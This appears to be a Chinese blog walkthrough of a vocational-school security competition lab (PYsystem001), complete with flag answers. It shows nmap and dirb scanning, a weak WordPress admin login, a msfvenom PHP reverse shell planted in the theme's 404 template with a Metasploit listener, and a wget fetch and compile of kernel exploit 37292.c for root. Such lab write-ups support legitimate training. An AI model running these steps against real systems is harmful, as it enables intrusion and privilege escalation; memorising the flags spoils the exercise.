中职技能大赛网络安全PYsystem001

服务器环境:PYsystem001

服务器场景操作系统:Ubuntu(关闭链接)

1.使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:【端口1,端口2…,端口n)提交

使用nmap扫描工具,扫描靶机的全部端口 #nmap -p- -T4 靶机ip

Flag:[443,8080]

2.通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;

访问这两个端口,发现8080端口是可以访问的,并且是wordpress框架,我们通dirb爆破靶机网站目录,找到后台登陆页面 # dirb http://靶机ip:8080

成功扫描到了靶机后台登录链接,访问之后使用弱口令用户密码admin,123456登录后台

FLag:[admin,123456]

3.利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;

来到kali,使用msfvenom工具生成反弹木马 # msfvenom -p php/meterpreter/reverse_tcp lhost=本地ip lport=1234 -f raw -o shell.php

FLag:[Payload]

4.对上述木马进行修改后上传到靶机系统,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;

先将wordpress后台语言修改为中文,设置的最底下的一个选项

设置好后来到kali,查看刚才生成的反弹木马,将反弹木马的内容复制下来

然后来到wordpress后台,找到主题下的编辑,编辑404模板

将刚才复制的反弹木马内容与404模板内容替换

然后回到kali,使用命令msfconsole打开msf工具,使用监听模块 # use exploit/multi/handler

设置参数

set payload php/meterpreter/reverse_tcp
set lhost 本地ip
set lport 1234
run

访问靶机网站404页面,反弹成功,之后进入shell命令行,输入whoami,查看当前权限

Flag:daemon

5.查看系统内核信息,将系统内核版本号(形式:[版本号])提交

使用uname -a查看内核版本号

Flag:[3.13.0-45-generic]

6.在kali攻击机查找可使用的漏洞源码,将找到的漏洞源码文件名为FLAG(形式:[文件名])提交;

使用searchsploit工具搜索源码 # searchsploit 3.13.0 ubuntu

Flag:[37292.c]

7.利用上述漏洞源码后得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

使用cp命令将漏洞源码复制到/var/www/html目录 # cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html

开启apache2服务 # service apache2 start

再回到靶机的shell命令行,将我们的37292.c漏洞源码下载下来 # wget http://kali的IP/37292.c

使用gcc工具编译刚刚下载下来的源码,并且执行生成的exp文件。 # gcc 37292.c -o exp

Flag:[adftutij]

8.利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交;

查看文件

Flag:[hyjufk983]

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇